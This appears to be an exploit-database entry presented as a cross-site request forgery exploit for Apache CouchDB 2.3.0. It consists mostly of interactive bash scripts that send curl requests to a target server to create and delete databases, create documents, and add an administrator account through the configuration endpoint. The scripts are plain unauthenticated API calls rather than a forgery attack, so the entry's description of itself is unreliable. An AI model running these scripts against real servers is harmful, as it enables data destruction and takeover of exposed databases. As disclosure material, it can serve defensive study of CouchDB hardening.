Apache CouchDB 2.3.0 Cross Site Request Forgery

Author: Ozer Goker Published: 2019-01-04 Verified: Verified



# Exploit Title: Apache CouchDB 2.3.0 Cross Site Request Forgery
# Date: 21.12.2018
# Exploit Author: Ozer Goker
# Vendor Homepage: http://couchdb.apache.org
# Software Link: http://couchdb.apache.org/#download
# Version: 2.3.0


Apache CouchDB is open source database software that focuses on ease of use
and having a scalable architecture. It has a document-oriented NoSQL
database architecture and is implemented in the concurrency-oriented
language Erlang; it uses JSON to store data, JavaScript as its query
language using MapReduce, and HTTP for an API.


Bash Script for Cross Site Request Forgery


Create Database

echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB

curl -X PUT "$IP:$PORT/$DB"


Delete Database

echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB

curl -X DELETE "$IP:$PORT/$DB"


Create Document

echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter DB Name:"
read DB
echo -n "Enter Document Name:"
read DOC

curl -X PUT "$IP:$PORT/$DB/$DOC" --data '{"_id":"$DOC"}'


Create Admin

echo -n "Enter IP:"
read IP
echo -n "Enter Port:"
read PORT
echo -n "Enter Admin Username:"
read username
echo -n "Enter Admin Password:"
read password

curl -X PUT "$IP:$PORT/_node/couchdb@localhost/_config/admins/$username" -H
"content-type: application/json" --data \"$password\"
